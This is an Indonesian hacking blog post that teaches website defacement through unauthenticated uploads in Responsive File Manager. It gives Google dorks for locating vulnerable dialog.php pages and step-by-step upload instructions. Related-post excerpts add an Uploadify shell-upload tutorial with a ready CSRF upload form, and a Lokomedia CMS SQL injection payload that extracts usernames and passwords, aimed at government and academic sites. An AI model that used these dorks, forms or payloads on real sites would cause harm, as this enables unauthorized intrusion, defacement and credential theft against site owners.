Deface Metode Responsife File Manager/FILE uploads :v DYCAL NOTES :V


DYCAL NOTES

DEFACE METODE RESPONSIFE FILE MANAGER
FILE UPLOADS


Deface Website Metode Responsive File Manager | File Upload Vulnerability
Deface Website Metode Responsive File Manager

Penjelasan  Resposive File Manager

Responsif File Manager adalah gratis open-source file manager dan gambar manajer dibuat dengan perpustakaan jQuery, CSS3, PHP dan HTML5 yang menawarkan cara yang bagus dan elegan untuk meng-upload dan menyisipkan file, gambar dan video.

Anda dapat menggunakannya sebagai plugin eksternal untuk versi TinyMCE 4.x (dan lebih tua), CKEditor dan CLEditor, Anda juga dapat menggunakannya sebagai file manager yang berdiri sendiri untuk mengelola dan pilih file.

Script secara otomatis membuat thumbnail dari gambar untuk daftar pratinjau dan dapat membuat juga thumbnail eksternal untuk digunakan dalam cms atau situs. Hal ini dapat dikonfigurasi untuk mengubah ukuran otomatis upload foto atau untuk secara otomatis membatasi ukuran. Anda dapat mempersonalisasi konfigurasi untuk setiap folder. Anda dapat mengatur subfolder sebagai root dan mengubah konfigurasi untuk setiap pengguna, halaman atau filemanager panggilan. Kompatibel dengan modus multi-user dan Anda dapat mengedit gambar dengan editor kandang burung, menyortir file

POC ini sebenarnya sudah cukup lama ya, ini merupakan metode yang awam atau untuk anak yang ingin belajar tentang dunia Deface ya, karena ini hanya sekedar upload saja.

Dork
Silahkan Kembangin biar dapet yang Verawan :p
inurl:/filemanager/ intext:�dialog.php�
inurl:/js/filemanager/ intext:�dialog.php�
inurl:/assets/filemanager/ intext:�dialog.php�

Exploit : Tambahkan /dialog.php dibelakang /Filemanager/

Langkah Deface Website Metode Responsive File Manager

1. Pertama lu copy salah satu Dork yang trus Paste and Search di Browser, tarkan muncul banyak target tuh, pilih aja yg mane terserah :D




2. Kemudian akan muncul seperti dibwah ini, klik aja [ dialog.php ] atau jika tidak muncul tambahkan Exploit diatas dibelakang /filemanager/.





3. Kemudian akan tampil halaman dialog.php kurang lebih seperti dibawah ini brow, klik aja Upload / Add File atau  Icon Upload :/




4. Klik di tulisan Drop Files untuk memilih file, atau bisa Drag file deface anda dari Explorer.





5. Kemudian Pilih File anda dan Klik Open untuk menyetujui pemilihan file :p




6. Kemudian akan langsung memulai proses upload secara otomatis jika file berhasil terupload maka akan ada tanda ceklis biasanya, jika gagal biasanya bertanda silang, jika gagal biasanya Format Filenya tidak diizinkan, Jika sudah sukses tinggal klik Return to Files List, dan akan reload otomatis dah halamannya.




7. Jika sudah selesai reload, ente cari dah filenya, apa namanya, lihat tanda panah merah, itu adalah file yang tadi ane upload :D


Deface Website Metode Responsive File Manager | File Upload Vulnerability


8. Untuk mengetahui URLnya, ente klik kanan aja Trus pilih Show URL dah.





9. Nah tampil tu URL dari file kita, ente copy saja, CTRL+C, biasanya kalau klik kanan tidak bisa :D



10. Paste di browser, dan jadi dah :D



Komentar

Posting Komentar

Postingan populer dari blog ini

DYCAL NOTES Tutorial Deface Teknik Uploadify Vulnerability Upload Shell

Gambar
DYCAL NOTES Tutorial Deface Teknik Uploadify Vulnerability Upload Shell Ini memang metode deface lama, tapi masih banyak kok yang pakai teknik ini :). Simak aja Tutorialnya Bahan-Bahan : PC/Laptop Koneksi Internet CSRF Dork Shell (kalo blm punya cari di gugel) Dork : inurl:/uploadify/ intitle:index of    (bisa di kembangkan lagi) CSRF : <form method="post" action="urltarget"> enctype="multipart/form-data"> <label for="file">Filename:</label> <input type="file" name="Filedata" ><br> <input type="submit" name="submit" value="Tusbol"> </form> Atau CSRF online di http://mouncyler-community.hol.es/expl/ lalu kalian pilih Filedata Tutorial : 1. Copy CSRF di atas lalu save dengan format .html 2. Dorking 3. Cari target, lalu cek apakah ada uploadify.php ?? (web yg vuln cirinya laman yg kosong/blank) 4. Edit CSRF yg tadi dah...
Baca selengkapnya

DYCAL NOTES Warga Memadati Sekitar Lokasi Bom Bunuh Diri Kampung Melayu

Gambar
Warga Memadati Sekitar Lokasi Bom Bunuh Diri Kampung Melayu DYC4L N0TES Lokasi ledakan dugaan bom bunuh diri di Halte Transjakarta Kampung Melayu, Jakarta Timur sudah dipasangi garis polisi. Sejumlah personel polisi pun telah berada di lokasi. Garis pembatas lokasi ledakan terpasang melintang sepanjang jalur khusus Transjakarta. Tampak di halte yang sudah berlubang akibat ledakan sudah dipenuhi polisi. Mereka terpantau tengah beraktivitas di dalam halte. Sedangkan warga terlihat memenuhi sekitar kawasan terjadinya ledakan. Beberapa pengguna jalan bahkan sampai memarkirkan kendaraannya untuk melihat tempat itu. Situasi lalu lintas di dekat lokasi tampak macet. Selain menghalau warga agar tidak semakin mendekat, arus lalu lintas juga coba diurai polisi.
Baca selengkapnya

DYCAL NOTES Tutorial Deface SQLi CMS Lokomedia

Gambar
DYCAL NOTES ⬇⬇⬇⬇⬇⬇⬇⬇⬇⬇⬇⬇ Tutorial Deface SQLi CMS Lokomedia Add Facebook Me Facebook.com/Mr.Cyrus404 Berbicara soal teknik SQLi CMS Lokomedia ini, pasti sudah kesohor di kalangan defacer/hacker tanah air. Terlebih lagi sekarang ini yg semakin banyak defacer yang mengexploit CMS Lokomedia ini. Ga usah panjang lebar langsung ke topik pembahasan yaitu "Tutorial Deface SQLi CMS Lokomedia" Bahan : 1. Dork : inurl:statis-1-profil.html inurl:statis-2-profil.html inurl:statis-3-strukturorganisasi.html Note : tambahkan site:org site:net :site:go.id site:ac.id site:id (Use Your Brain) 2. Exploit SQLi (SQL Injection) : 'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+ Bingung cara ngexploit nya ?? sini di kasih tau :v contoh : http://sitepemerintah.co.li/statis-2-profil.html kamu tambahin exploit nya sesudah angka jadi kaya gini : http://sitepemerintah.co.li/statis-2'unio...
Baca selengkapnya